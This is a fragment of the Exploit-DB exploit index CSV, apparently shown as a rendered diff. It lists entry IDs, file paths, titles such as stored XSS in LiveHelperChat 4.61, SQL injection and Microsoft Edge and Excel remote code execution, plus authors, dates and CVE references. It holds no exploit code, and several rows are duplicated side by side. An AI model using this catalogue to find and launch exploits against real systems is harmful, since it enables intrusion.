34721,exploits/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",webapps,php,,2014-09-20,2014-09-20,0,CVE-2014-6420;OSVDB-111744,,,,, 34721,exploits/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",webapps,php,,2014-09-20,2014-09-20,0,CVE-2014-6420;OSVDB-111744,,,,,
52381,exploits/php/webapps/52381.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51403,,,,,
52378,exploits/php/webapps/52378.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51398,,,,,
52377,exploits/php/webapps/52377.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51397,,,,,
52379,exploits/php/webapps/52379.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51400,,,,,
52376,exploits/php/webapps/52376.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51396,,,,,
52380,exploits/php/webapps/52380.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51401,,,,,
42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, 42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",webapps,php,,2004-02-23,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9727/info 23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",webapps,php,,2004-02-23,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9727/info
42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, 42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
@ -44161,6 +44172,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4279,exploits/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,remote,windows,,2007-08-09,,1,OSVDB-36399;CVE-2007-4336,,,,, 4279,exploits/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,remote,windows,,2007-08-09,,1,OSVDB-36399;CVE-2007-4336,,,,,
40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,,2017-01-05,2018-05-18,0,CVE-2016-7200;CVE-2016-7201,"Client Side",,,,https://github.com/theori-io/chakra-2016-11 40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,,2017-01-05,2018-05-18,0,CVE-2016-7200;CVE-2016-7201,"Client Side",,,,https://github.com/theori-io/chakra-2016-11
45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,,2018-09-27,2018-09-28,1,CVE-2018-8469;CVE-2018-8468;CVE-2018-8463,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&can=1&q=&sort=-modified%20-id&colspec=ID%20Status%20Owner%20Summary%20Modified&desc=5 45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,,2018-09-27,2018-09-28,1,CVE-2018-8469;CVE-2018-8468;CVE-2018-8463,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&can=1&q=&sort=-modified%20-id&colspec=ID%20Status%20Owner%20Summary%20Modified&desc=5
52372,exploits/windows/remote/52372.txt,"Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)",2025-07-22,nu11secur1ty,remote,windows,,2025-07-22,2025-07-22,0,CVE-2015-6176,,,,,https://www.cve.org/CVERecord?id=CVE-2015-6176
35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows,,2011-04-12,2014-12-27,1,CVE-2011-0104;OSVDB-71761,,,,,https://www.securityfocus.com/bid/47245/info 35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows,,2011-04-12,2014-12-27,1,CVE-2011-0104;OSVDB-71761,,,,,https://www.securityfocus.com/bid/47245/info
28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows,,2006-07-06,2013-09-17,1,CVE-2006-3431;OSVDB-27053,,,,,https://www.securityfocus.com/bid/18872/info 28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows,,2006-07-06,2013-09-17,1,CVE-2006-3431;OSVDB-27053,,,,,https://www.securityfocus.com/bid/18872/info
52343,exploits/windows/remote/52343.py,"Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)",2025-06-26,nu11secur1ty,remote,windows,,2025-06-26,2025-06-26,0,CVE-2025-47165,,,,, 52343,exploits/windows/remote/52343.py,"Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)",2025-06-26,nu11secur1ty,remote,windows,,2025-06-26,2025-06-26,0,CVE-2025-47165,,,,,

Can't render this file because it is too large.